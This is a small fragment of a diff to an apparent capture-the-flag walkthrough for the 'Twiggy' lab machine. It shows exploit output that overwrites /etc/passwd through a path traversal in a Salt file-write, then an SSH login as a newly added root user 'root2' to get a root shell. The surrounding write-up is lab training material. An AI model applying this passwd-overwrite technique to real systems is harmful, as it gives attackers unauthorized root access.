mglx01/Offsec_PG_Practice/Linux/Twiggy.md

 [+] Attemping to upload passwd to ../../../../../etc/passwd on 192.168.242.62
 [ ] Wrote data to file /srv/salt/../../../../../etc/passwd
 ```
-login via ssh with the new user root2
+login via ssh with the new user root2 and the password we just created
 And we got the root shell
 ```
 $ ssh root2@192.168.242.62